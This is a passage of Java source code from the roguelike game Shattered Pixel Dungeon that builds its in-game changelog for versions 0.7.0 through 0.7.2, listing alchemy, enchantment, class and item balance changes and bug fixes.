changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.ARMOR_PLATE, new ItemSprite.Glowing( 0x660022 )), "Enchant/Glyph Nerfs",
"_-_ Chilling now only stacks the chilled debuff up to 6 turns.\n\n" +
"_-_ Thorns now bleeds enemies for a set amount based on armor level, instead of scaling with damage dealt.\n\n" +
"_-_ Antimagic no longer affects the melee attacks of magic wielding enemies.\n" +
"_-_ Antimagic no longer bases its blocking power on armor directly, now uses its own calculation which scales on level. This is a slight boost for lower tier armors and a nerf for higher tier ones."));
}
public static void add_v0_7_2_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.7.2", true, "");
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes = new ChangeInfo(Messages.get(ChangesScene.class, "new"), false, null);
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released Mar 18th, 2019\n" +
"_-_ 90 days after Shattered v0.7.1\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.POTION_CATALYST, null), "Catalysts!",
"Added two new recipes: _Alchemical Catalysts_ and _Arcane Catalysts._\n\n" +
"These catalysts are made with any potion/scroll, and a seed/runestone. They replace many specific items for higher-cost recipes. Alchemy should be much more flexible now!\n\n" +
"Additional Alchemy Changes:\n\n" +
"When a recipe asks for any item of a certain type that item no longer has to be identified.\n\n" +
"Alchemy guidebook pages now spawn more slowly at earlier stages of the game, and significantly faster at later stages of the game."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.LONGSWORD, new ItemSprite.Glowing(0x0000FF)), "Enchantment Overhaul!",
"Enchantments have been significantly rebalanced to be less about direct damage and more about utility and situational power. Their design should now be more similar to glyphs.\n\n" +
"Buffed Enchants: Chilling, Lucky.\n\n" +
"Nerfed Enchants: Blazing, Shocking, Grim, Vampiric\n\n" +
"Removed Enchants: Vorpal, Venomous, Dazzling, Eldritch, and Stunning.\n\n" +
"New Enchants: Blocking, Blooming, Elastic (formerly a curse), Precise, and Swift.\n\n" +
"New Curse: Polarized.\n\n" +
"Some battlemage effects have been adjusted to accommodate these new enchantments. Most of these are very minor, except staff of regrowth, which now procs blooming."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.MAGIC_INFUSE, null), "Enchantment Adjustments",
"_-_ Significantly adjusted when enchants/glyphs are lost when items are upgraded. Items are now always safe up to +4, then have a growing chance until +8 where enchantment loss is guaranteed.\n\n" +
"_-_ Upgrades now have a set 33% chance to cleanse curses, instead of a chance which scales with level.\n\n" +
"Magical Infusion spell adjusted:\n" +
"_-_ Recipe changed to: upgrade + catalyst + 4 energy.\n" +
"_-_ No longer applies an enchant/glyph, instead is guaranteed to preserve one while upgrading."));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "changes"), false, null);
changes.hardlight( CharSprite.WARNING );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.BREW_INFERNAL, null), "Combination Items",
"The following combination items are no longer craftable, and are effectively removed from the game:\n" +
"_-_ Wicked Brew\n" +
"_-_ Frigid Brew\n" +
"_-_ FrostFire Brew\n" +
"_-_ Elixir of Restoration\n" +
"_-_ Elixir of Vitality\n\n" +
"These items offered no unique gameplay and existed purely to give a few cheap recipes. Thanks to catalysts filling that role, they no longer have a reason to exist. FrostFire Brew in particular may return in some form."));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"_-_ The Identification system has been adjusted to require EXP gain in addition to item uses. " +
"This change prevents exploits where an item could be used in unintended ways to rapidly ID it. " +
"Items should ID at about the same rate if exp is gained while using them.\n\n" +
"_-_ Increased the max level to gain exp from gnoll brutes and cave spinners by 1.\n\n" +
"_-_ Sniper's mark now lasts for 2 turns, up from 1. This should make it easier to use with slow weapons, or while slowed.\n\n" +
"Elixir of Might reworked:\n" +
"_-_ Recipe changed to: strength + catalyst + 5 energy\n" +
"_-_ Health boost now scales up with level, but fades after the hero gains a few levels\n\n" +
"_-_ Meat Pie recipe cost reduced from 9 to 6, total healing reduced from 45 to 25\n\n" +
"_-_ Added a privacy policy link to the Google Play edition of Shattered."));
changes.addButton( new ChangeButton(new Image(Assets.SPINNER, 144, 0, 16, 16), Messages.get(ChangesScene.class, "bugfixes"),
"Fixed:\n" +
"_-_ Various rare crash bugs\n" +
"_-_ Various minor visual bugs\n" +
"_-_ Grim enchant activating when an enemy is already dead\n" +
"_-_ Burning destroying scrolls when the hero is immune to it\n" +
"_-_ Chasms killing enemies which are already dead in some cases\n" +
"_-_ Thieves not correctly interacting with quickslotted items\n" +
"_-_ Screen orientation not always being set when game starts\n" +
"_-_ Flying characters pushing the ground after teleporting\n" +
"_-_ Bombs rarely damaging tengu multiple times\n" +
"_-_ Thrown weapons instantly breaking in rare cases\n" +
"_-_ Dwarf King summoning skeletons while frozen\n" +
"_-_ Incorrect behaviour when wands recharge very quickly\n" +
"_-_ Thieves rarely escaping when they are close\n" +
"_-_ Beacon of returning losing set location when scroll holder is picked up\n" +
"_-_ Recycle not giving an item if inventory is full\n" +
"_-_ Rare cases where the game wouldn't save during alchemy"));
changes.addButton( new ChangeButton(Icons.get(Icons.LANGS), Messages.get(ChangesScene.class, "language"),
"Updated Translations\n\n" +
"Updated Translator Credits"));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"Major internal improvements to service integrations for Google Play version of the game:\n" +
"_-_ 'Share Gameplay Data' now uses Google Firebase Analytics instead of older Google Analytics. Data collected is unchanged.\n" +
"_-_ Many internal improvements to Google Play Games sync and Google Payment integration.\n" +
"_-_ Item renaming donation perk now applies to wands.\n\n" +
"_-_ Added support for adaptive icons in Android 8.0+.\n" +
"_-_ Improved how the game handles orientation changes and window resizing.\n" +
"_-_ Shocking enchantment no longer visually arcs lightning to the hero."));
changes.addButton( new ChangeButton(new Image(Assets.SPINNER, 144, 0, 16, 16), Messages.get(ChangesScene.class, "bugfixes"),
"Fixed (existed before 0.7.2):\n" +
"_-_ Cloak of Shadows very rarely consuming more charges than it should\n" +
"_-_ Assassin's blink not working on enemies standing on traps\n" +
"_-_ Glyph of stone blocking an incorrect amount of damage (too low) in some cases\n" +
"_-_ Hourglass not updating charges correctly in some cases\n" +
"_-_ Blandfruit bush rarely appearing in 'on diet' challenge\n" +
"_-_ Strength from ring of might not appearing in rankings\n" +
"_-_ Multiplicity curse spawning rats on floor 5\n" +
"_-_ Dried rose rarely being usable before completing ghost quest\n" +
"_-_ Corrupted thieves being able to steal from the hero\n" +
"_-_ Rare crashes involving rankings windows\n" +
"_-_ Crashes and other odd behaviour when a berserking hero is affected by shielding buffs\n" +
"_-_ Tengu spawning on top of other characters\n" +
"_-_ Cloak of shadows only being usable from quickslots if it has 1 charge"));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "buffs"), false, null);
changes.hardlight( CharSprite.POSITIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new WandOfTransfusion(),
"Wand of Transfusion changed significantly when used on enemies:\n" +
"_-_ No longer self-harms, now grants a mild self-shield instead\n" +
"_-_ Charm duration no longer scales with level, damage to undead enemies reduced"));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.RING_AMETHYST, null), Messages.get(RingOfWealth.class, "name"),
"Ring of Wealth significantly buffed:\n" +
"_-_ Special item drops now happen ~50% more often\n" +
"_-_ The ring of wealth now awards a greater variety of items from special drops\n" +
"_-_ special wealth drops have a 1/10 chance to award a high value item\n" +
"_-_ Wraiths and minion enemies no longer have a chance to generate wealth items"));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.SPEAR, new ItemSprite.Glowing(0x00FFFF)), "Buffed Enchants",
"_-_ Chilling now stacks with itself over multiple procs\n\n" +
"_-_ Lucky buffed/reworked. No longer affects damage, now generates bonus items when enemies are killed with a lucky weapon."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.SEED_SWIFTTHISTLE, null), "Item Balance Adjustments",
"Several seeds and stones have been buffed:\n" +
"_-_ Player can now move without cancelling swiftthistle's effect\n" +
"_-_ Duration of poison from sorrowmoss increased by ~33%\n" +
"_-_ Increased the strength of warden's earthroot effect\n" +
"_-_ Stone of clairvoyance no longer disarms traps, now goes through walls instead\n" +
"_-_ Stone of detect curse is reworked, now stone of disarming. Disarms up to 9 traps where it is thrown.\n" +
"_-_ Stone of aggression now forces enemies to attack a target. Duration is longer if thrown at allies.\n\n" +
"_-_ Scroll of teleportation now teleports the player to the entrance of secret/special rooms instead of into them\n\n" +
"_-_ Blessed ankhs now cure the same debuffs as a potions of healing\n\n" +
"Fire and toxic gas have been adjusted to deal damage based on dungeon depth, and not target max health. " +
"This means more damage versus regular enemies, and less versus bosses. " +
"Several bosses have lost their resistances to these effects as a result of this change."));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "nerfs"), false, null);
changes.hardlight( CharSprite.NEGATIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.DIRK, new ItemSprite.Glowing(0xFF4400)), "Nerfed Enchants",
"_-_ Blazing no longer deals direct damage, now instead is more likely to set enemies on fire.\n\n" +
"_-_ Shocking no longer deals damage to enemy being attacked, deals more damage to surrounding enemies.\n\n" +
"_-_ Vampiric now grants less health when hero is at higher HP.\n\n" +
"_-_ Grim is now more likely to 'finish off' an enemy, but is less likely to activate at higher enemy health."));
}
public static void add_v0_7_1_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.7.1", true, "");
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes = new ChangeInfo(Messages.get(ChangesScene.class, "new"), false, null);
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released Dec 18th, 2018\n" +
"_-_ 61 days after Shattered v0.7.0\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton( new Image(Assets.HUNTRESS, 0, 15, 12, 15), "Huntress Reworked!",
"The Huntress has received a class overhaul!\n\n" +
"Her boomerang has been replaced with a bow. The bow has infinite uses, like the boomerang, but cannot be upgraded directly, instead it will grow stronger as the huntress levels up.\n\n" +
"Her knuckledusters have been replaced with studded gloves. This change is purely cosmetic.\n\n" +
"Those with runs in progress will have their boomerang turn into a bow, and will regain most of the scrolls of upgrade spent on the boomerang.\n\n" +
"The huntress can now also move through grass without trampling it (she 'furrows' it instead)."));
changes.addButton( new ChangeButton( new Image(Assets.HUNTRESS, 0, 90, 12, 15), "Huntress Subclasses Reworked!",
"Huntress subclasses have also received overhauls:\n\n" +
"The Sniper can now see 50% further, penetrates armor with ranged attacks, and can perform a special attack with her bow.\n\n" +
"The Warden can now see through grass and gains a variety of bonuses to plant interaction."));
changes.addButton( new ChangeButton( new ItemSprite(ItemSpriteSheet.TRIDENT, null), "Thrown Weapon Improvements",
"Thrown weapons now show their tier, ranging from 1-5 like with melee weapons.\n\n" +
"All Heroes now benefit from excess strength on thrown weapons.\n\n" +
"Thrown weapons now get +50% accuracy when used at range.\n\n" +
"Thrown weapons can now be upgraded!\n" +
"_-_ Upgrades work on a single thrown weapon\n" +
"_-_ Increases damage based on tier\n" +
"_-_ Gives 3x durability each upgrade\n" +
"_-_ Weapons with 100+ uses now last forever\n" +
"_-_ Darts are not upgradeable, but tipped darts can get extra durability\n\n" +
"Ring of sharpshooting has been slightly adjusted to tie into this new upgrade system."));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "changes"), false, null);
changes.hardlight( CharSprite.WARNING );
changeInfos.add(changes);
changes.addButton( new ChangeButton(BadgeBanner.image(Badges.Badge.UNLOCK_MAGE.image), "Hero Class changes",
"All heroes except the warrior now need to be unlocked via new badges. The requirements are quite simple, with the goal of giving new players some early goals. Players who have already unlocked characters will not need to re-unlock them.\n\n" +
"To help accelerate item identification for alchemy, all heroes now start with 3 identified items: The scroll of identify, a potion, and another scroll."));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"Added a partial turn indicator to the game interface, which occupies the same spot as the busy icon. This should make it much easier to plan actions that take more or less than 1 turn.\n\n" +
"Rings now have better descriptions for their stats! All rings now show exactly how they affect you in a similar way to how other equipment gives direct stats.\n\n" +
"Precise descriptions have been added for weapons which block damage.\n\n" +
"Added item stats to the item catalog.\n\n" +
"Dropping an item now takes 1 turn, up from 0.5 turns."));
changes.addButton( new ChangeButton(new Image(Assets.SPINNER, 144, 0, 16, 16), Messages.get(ChangesScene.class, "bugfixes"),
"Fixed:\n" +
"_-_ various crash bugs\n" +
"_-_ various minor visual bugs\n" +
"_-_ recycle being able to produce health potions with pharmacophobia enabled\n" +
"_-_ magical porter soft-locking the game in rare cases\n" +
"_-_ mystical energy recharging some artifacts incorrectly\n" +
"_-_ health potion limits not applying to prison guards\n" +
"_-_ traps with ground-based effects affecting flying characters\n" +
"_-_ odd behaviour when transmuting certain items\n" +
"_-_ keys rarely spawning without chests\n" +
"_-_ fireblast rarely damaging things it shouldn't\n" +
"_-_ dew drops from dew catchers landing on stairs\n" +
"_-_ ankh revive window rarely closing when it shouldn't\n" +
"_-_ flock and summoning traps creating harsh sound effects\n" +
"_-_ thrown weapons being lost when used on sheep\n" +
"_-_ various specific errors when actions took more than 1 turn\n" +
"_-_ various freeze bugs caused by Tengu"));
changes.addButton( new ChangeButton(Icons.get(Icons.LANGS), Messages.get(ChangesScene.class, "language"),
"Updated translations\n\n" +
"Updated translator credits"));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "buffs"), false, null);
changes.hardlight( CharSprite.POSITIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton( new Image(Assets.ROGUE, 0, 15, 12, 15), "Hero Buffs",
"_-_ Rogue's cloak of shadows base charge speed increased by ~11%, scaling reduced to compensate.\n\n" +
"_-_ Warlock's soul mark base chance increased to 15% from 10%, scaling reduced to compensate.\n\n" +
"_-_ Warlock's soul mark hunger restoration increased by 100%, health restoration increased by 33%."));
changes.addButton( new ChangeButton( new ItemSprite(ItemSpriteSheet.RING_TOPAZ, null), "Various Item Buffs",
"_-_ Ring of energy simplified/buffed. Now grants a flat +25% charge speed per level, instead of +1 effective missing charge per level\n\n" +
"_-_ Ring of elements power increased to 16% from 12.5%\n\n" +
"_-_ Ring of wealth 'luck' bonus increased to 20% from 15%\n\n" +
"_-_ Bolas base damage increased to 6-9 from 4-6\n\n" +
"_-_ Wand of regrowth now spawns furrowed grass when it begins to run out of energy due to excessive use, instead of short grass.\n\n" +
"Wand of fireblast buffed:\n" +
"_-_ shot distance at 3 charges reduced by 1\n" +
"_-_ damage at 1 charge reduced slightly\n" +
"_-_ damage at 2/3 charges increased by ~15%"));
changes.addButton( new ChangeButton( new ItemSprite(ItemSpriteSheet.ARMOR_LEATHER, new ItemSprite.Glowing(0x222222)), "Other Buffs",
"_-_ vorpal enchant bleed reduced by 20%\n\n" +
"_-_ glyph of potential wand charge bonus increased by 20%\n\n" +
"_-_ glyph of stone evasion conversion efficiency increased to 75% from 60%"));
changes.addButton( new ChangeButton(new Image(Assets.KING, 1, 0, 14, 16), "Dwarf King",
"While I would like to make more extensive changes to Dwarf King in the future, I've made a couple smaller tweaks for now to make him harder to cheese:\n\n" +
"_-_ Dwarf King is now able to summon skeletons even if he cannot see the hero\n" +
"_-_ Dwarf King is now resistant to fire and toxic gas"));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "nerfs"), false, null);
changes.hardlight( CharSprite.NEGATIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton( new Image(Assets.WARRIOR, 0, 15, 12, 15), "Warrior Nerfs",
"_-_ Warrior's shielding regen scaling reduced by ~15%. This is primarily a lategame nerf."));
changes.addButton( new ChangeButton( new ItemSprite(ItemSpriteSheet.RING_RUBY, null), "Ring Nerfs",
"Ring of furor has been nerfed/simplified:\n" +
"_-_ Now provides a flat +10.5% attack speed per level, instead of speed which scales based on how slow the weapon is.\n\n" +
"This means the ring is effectively nerfed for slow weapons and regular weapons, and slightly buffed for fast weapons. A +6 ring grants almost exactly doubled attack speed.\n\n\n" +
"The ring of force's equipped weapon bonus was always meant as a small boost so it wasn't useless if the player already had a better weapon. It wasn't intended to be used to both replace melee and then boost thrown weapons.\n" +
"_-_ The ring of force no longer gives bonus damage to thrown weapons."));
changes.addButton( new ChangeButton( new Gauntlet(),
"As furor now works much better with fast weapons, I've taken the opportunity to very slightly nerf sai and gauntlets\n\n" +
"_-_ Sai blocking down to 0-2 from 0-3\n" +
"_-_ Gauntlet blocking down to 0-4 from 0-5"));
changes.addButton( new ChangeButton( new Shuriken(),
"Shuriken have been adjusted due to the new upgrade system:\n\n" +
"_-_ Base damage increased to 4-8 from 4-6\n" +
"_-_ Durability reduced to 5 from 10"));
}
public static void add_v0_7_0_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.7.0", true, "");
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes = new ChangeInfo(Messages.get(ChangesScene.class, "new"), false, null);
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released Oct 18th, 2018\n" +
"_-_ 501 days after Shattered v0.6.0\n" +
"_-_ 168 days after Shattered v0.6.5\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(new Image(Assets.TILES_SEWERS, 48, 96, 16, 16 ), "Alchemy Overhaul!",
"The game's alchemy system has been entirely overhauled!\n\n" +
"Alchemy is now a full consumable crafting system which lets you create all kinds of new items.\n\n" +
"There is also a new resource: alchemical energy. Every alchemy pot has some energy within it. Some recipes require this energy, so make sure to use it wisely!\n\n" +
"All of this is explained in a new guidebook specifically for alchemy. Pages of it can be found in alchemy rooms. Existing players will be given some pages automatically to get started."));
changes.addButton( new ChangeButton(new AlchemistsToolkit(),
"The Alchemist's Toolkit returns!\n\n" +
"The toolkit can be found like any other artifact, and acts as a sort of horn of plenty for the new alchemical energy resource."));
changes.addButton( new ChangeButton(new Image(Assets.TERRAIN_FEATURES, 32, 112, 16, 16), "New Consumables",
"Added a new scroll, potion, and plant!\n\n" +
"_-_ Scroll of transmutation is a rare scroll which allows the user to change an item into another one of the same type. Note that it cannot be used to make scrolls of magical infusion.\n\n" +
"_-_ Potion of haste is an uncommon potion which grants a temporary burst of speed.\n\n" +
"_-_ Swiftthistle is the plant counterpart to potions of haste. Both the plant and tipped dart give various speed or time-based buffs."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.STONE_BLINK, null), "Runestones",
"Added 10 new runestones, and runestone crafting!\n\n" +
"Two or three runestones can be crafted by using a scroll with an alchemy pot.\n\n" +
"Runestones give various effects that are similar in theme to their scroll counterpart.\n\n" +
"Runestones also naturally appear in alchemy rooms, and a new special room type."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.EXOTIC_AMBER, null), "Exotic Potions",
"Added 12 new potions which can be created through alchemy!\n\n" +
"Mix a potion and any two seeds to create an exotic potion with unique effects.\n\n" +
"Exotic Potions are only available through alchemy, or by transmuting a regular potion."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.EXOTIC_ISAZ, null), "Exotic Scrolls",
"Added 12 new scrolls which can be created through alchemy!\n\n" +
"Mix a scroll and any two runestones to create an exotic scroll with unique effects.\n\n" +
"Exotic Scrolls are only available through alchemy, or by transmuting a regular scroll."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.RETURN_BEACON, null), "New Recipes!",
"Added ~40 other items which can be created through alchemy!\n\n" +
"Most of these recipes require alchemical energy, and information about them can be found within alchemy guidebook pages in the prison and deeper in the dungeon.\n\n" +
"All of these items are only available through alchemy."));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "changes"), false, null);
changes.hardlight( CharSprite.WARNING );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.ARTIFACT_ARMBAND, null), "Spawn Rate Changes",
"_-_ Master Thieves' Armband is now a regularly dropping artifact.\n" +
"_-_ Thieves now rarely drop a random ring or artifact instead of the armband.\n\n" +
"_-_ Blandfruit seeds and wells of transmutation have been removed.\n" +
"_-_ Potion of Might and Scroll of Magical infusion are now produced through alchemy.\n" +
"_-_ Transmuting potions/scrolls now gives their exotic variant, and vice-versa.\n\n" +
"_-_ One runestone of enchantment and one runestone of intution are guaranteed per run.\n" +
"_-_ Potion and scroll drops are now slightly more varied.\n" +
"_-_ Reduced the droprate of bombs.\n\n" +
"_-_ Adjusted enchant/glyph probabilities slightly. rare ones should be slightly more common.\n\n" +
"_-_ There is now a guaranteed alchemy room every chapter."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.ARTIFACT_BEACON, null), "Boss reward changes",
"Boss rewards have been significantly adjusted:\n\n" +
"_-_ Lloyd's beacon and Cape of Thorns no longer drop, they are effectively removed from the game.\n\n" +
"_-_ Goo and DM-300 now drop unique alchemy ingredients instead.\n\n" +
"_-_ Lloyd's beacon has been replaced by alchemy recipes, Cape of Thorns will likely return in some form in the future."));
changes.addButton( new ChangeButton(new Blandfruit(),
"Blandfruit has been changed to be more consistent with potions.\n\n" +
"All blandfruit types now exactly mimic their potion counterparts, there are now no blandfruit-exclusive effects.\n\n" +
"When a thrown blandfruit shatters, it will now leave behind blandfruit chunks, which can be eaten. This allows offensive blandfruits to be used without losing their food value.\n\n" +
"The previous unique mechanics of earthfruit, sorrowfruit, and firefruit have been recycled into the new alchemy system."));
changes.addButton( new ChangeButton(new UnstableSpellbook(),
"The unstable spellbook has received a mini-rework to go along with the new exotic scrolls.\n\n" +
"_-_ Previous enhanced scroll mechanic removed.\n\n" +
"_-_ Feeding a scroll to the spellbook now allows you to use either that scroll, or its exotic equivalent.\n\n" +
"_-_ Using the exotic variant of a scroll costs 2 charges instead of 1.\n\n" +
"_-_ Charge speed at low levels increased. Max charges increased to 8 from 6."));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"_-_ Potions which should be thrown can now be thrown from the quickslot, if they are IDed.\n" +
"_-_ Thrown items and wand zaps now go through tall grass.\n" +
"_-_ Expanded what items bags can carry. Most alchemy produce can fit in a bag, magical holster now holds bombs.\n\n" +
"_-_ Caustic ooze now lasts a max of 20 turns.\n" +
"_-_ Bleeding damage is now more consistent.\n\n" +
"_-_ Adjusted the text for breaking paralysis.\n"+
"_-_ Adjusted various potion/plant/seed sprites.\n" +
"_-_ Healing now has an icon and description.\n" +
"_-_ Improved the layering system for raised terrain like grass.\n" +
"_-_ Added an ingame version indicator.\n" +
"_-_ Added a new indicator for when an item is not identified, but known to be uncursed.\n\n" +
"_-_ Improved payment & sync functions on Google Play version.\n\n" +
"_-_ Adjusted bone pile functionality to make it more clear that a spawning wraith means an item is cursed."));
changes.addButton( new ChangeButton(new Image(Assets.SPINNER, 144, 0, 16, 16), Messages.get(ChangesScene.class, "bugfixes"),
"Fixed:\n" +
"_-_ Various rare crash and freeze bugs\n" +
"_-_ Various audio and visual bugs\n" +
"_-_ Sad Ghost attacking nonexistent enemies\n" +
"_-_ Various rare cases where item windows could stack\n" +
"_-_ Cases where projectiles would disappear\n" +
"_-_ Multiplicity curse duplicating projectiles\n" +
"_-_ Lucky enchant not correctly scaling with upgrades\n" +
"_-_ Various effects incorrectly working on dead characters\n" +
"_-_ Wands never appearing in heroes remains\n" +
"_-_ Remains rarely appearing inside bookcases on floor 20\n" +
"_-_ Wand of corruption doing nothing to corrupted enemies\n" +
"_-_ Augmented weapons rarely having inconsistent speed\n" +
"_-_ Scroll of upgrade revealing curses on unidentified items\n" +
"_-_ Item curses rarely not being revealed when they should be\n" +
"_-_ Assassin buffs not being cleared when they should in some cases\n" +
"_-_ Rooting not working correctly on retreating enemies\n" +
"_-_ Searching spending hunger in a locked level\n" +
"_-_ 'Faith is my armor' deleting class armors\n" +
"_-_ Various cases where the player can be ontop of enemies"));
changes.addButton( new ChangeButton(new Image(Assets.SPINNER, 144, 0, 16, 16), Messages.get(ChangesScene.class, "bugfixes"),
"Fixed:\n" +
"_-_ Various screen layout issues in power saver mode\n" +
"_-_ Crashes when tengu is healed above 1/2 health\n" +
"_-_ Bolas incorrectly requiring 15 strength\n" +
"_-_ Non-heroes being able to use reach weapons through walls\n" +
"_-_ Antimagic glyph applying to more effects when used by the sad ghost\n" +
"_-_ Some items not being known as uncursed when sold from shops\n" +
"_-_ Obfuscation glyph not improving every upgrade\n" +
"_-_ Magical sleep rarely cancelling paralysis\n" +
"_-_ Exploits where bone piles could be used to check if an item was cursed"));
changes.addButton( new ChangeButton(Icons.get(Icons.LANGS), Messages.get(ChangesScene.class, "language"),
"Updated Translations\n\nUpdated translator credits\n\nAdded new language: Basque!"));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "buffs"), false, null);
changes.hardlight( CharSprite.POSITIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new WandOfTransfusion(),
"Wand of transfusion has been rebalanced, with an emphasis on making it much more useful in conjunction with weaker allies:\n\n" +
"_-_ Using the wand still costs 10% max hp\n\n" +
"_-_ Ally healing adjusted to 10% of user max HP + a flat 3 per level, from 30% + 3%/lvl missing hp\n\n" +
"_-_ Ally healing can now overheal up to whatever the max healing per shot is\n\n" +
"_-_ Undead damage is is now the same as ally healing, from 30% + 5%/lvl max hp\n\n" +
"_-_ Charming is now more powerful at higher wand levels\n\n" +
"_-_ All other transfusion functionality has been removed"));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.SCROLL_KAUNAN, null), new ScrollOfTeleportation().trueName(),
"The scroll of teleportation has been buffed. It now prioritizes sending the user to rooms they have not seen yet, and can teleport to secret rooms."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.SCROLL_ODAL, null), new ScrollOfMirrorImage().trueName(),
"Scroll of mirror image has been adjusted to have more interactions with other items, but to also be less powerful at base:\n\n" +
"_-_ Scroll now spawns 2 images, down from 3\n\n" +
"_-_ Mirror images now attack with the hero's weapon, at 50% damage\n\n" +
"_-_ Images no longer fade after a successful attack, instead they pull enemy aggro\n\n" +
"_-_ Images start out invisible, have 1 hp, no blocking power, but do inherit some of the hero's evasion."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.SCROLL_NAUDIZ, null), new ScrollOfTerror().trueName(),
"Terror now has it's duration reduced by 5 whenever damage is taken, rather than being removed entirely. Scroll of terror duration has been increased to 20 from 10.\n\n" +
"Charm now has it's duration reduced by 5 whenever damage is taken, rather than not losing any duration. Succubi have been given a life-drain ability in compensation, and various charming effects have had their durations adjusted."));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "nerfs"), false, null);
changes.hardlight( CharSprite.NEGATIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new WandOfRegrowth(),
"Wand of regrowth will now cease producing plants if it is overused. Charges spent before it begins degrading will increase if the wand is upgraded. At +12 the wand will function infinitely.\n\n" +
"This change is made to combat farming with low-levelled wands of regrowth. Especially with the alchemy changes this would be far too powerful. Infinite farming is still possible, but requires upgrades."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.SCROLL_GYFU, null), new ScrollOfRetribution().trueName(),
"The scroll of psionic blast is now known as the scroll of retribution:\n" +
"_-_ removed damage and stun penalty, now self-weakens instead\n" +
"_-_ now blinds enemies as well as the player\n" +
"_-_ damage dealt now scales with missing player HP. At very low HP scroll is still an instakill on most enemies\n\n" +
"Scroll of psionic blast still exists however. It is now an exotic scroll!"));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.POTION_CRIMSON, null), new PotionOfHealing().trueName(),
"_-_ Speed of healing effects (e.g. potion of healing) have been reduced slightly. Overall heal amounts unchanged."));
changes.addButton( new ChangeButton(new Honeypot(),
"Bees were never intended to be used as a boss-killing tool by stacking many of them onto one area. This use has now been restricted:\n" +
"_-_ Bees are now hostile to eachother\n\n" +
"Note that the new alchemy system may have a recipe which helps calm angry bees down..."));
}
}
| 69,992 | v0_7_X_Changes | java | en | java | code | {"qsc_code_num_words": 10204, "qsc_code_num_chars": 69992.0, "qsc_code_mean_word_length": 4.9372795, "qsc_code_frac_words_unique": 0.16317131, "qsc_code_frac_chars_top_2grams": 0.00786026, "qsc_code_frac_chars_top_3grams": 0.04148472, "qsc_code_frac_chars_top_4grams": 0.06768559, "qsc_code_frac_chars_dupe_5grams": 0.31528384, "qsc_code_frac_chars_dupe_6grams": 0.27975387, "qsc_code_frac_chars_dupe_7grams": 0.25522033, "qsc_code_frac_chars_dupe_8grams": 0.23060738, "qsc_code_frac_chars_dupe_9grams": 0.20639143, "qsc_code_frac_chars_dupe_10grams": 0.1987892, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01530214, "qsc_code_frac_chars_whitespace": 0.1764916, "qsc_code_size_file_byte": 69992.0, "qsc_code_num_lines": 999.0, "qsc_code_num_chars_line_max": 384.0, "qsc_code_num_chars_line_mean": 70.06206206, "qsc_code_frac_chars_alphabet": 0.85875883, "qsc_code_frac_chars_comments": 0.01114413, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.20410628, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.2089372, "qsc_code_frac_chars_string_length": 0.65731376, "qsc_code_frac_chars_long_word_length": 0.00063573, 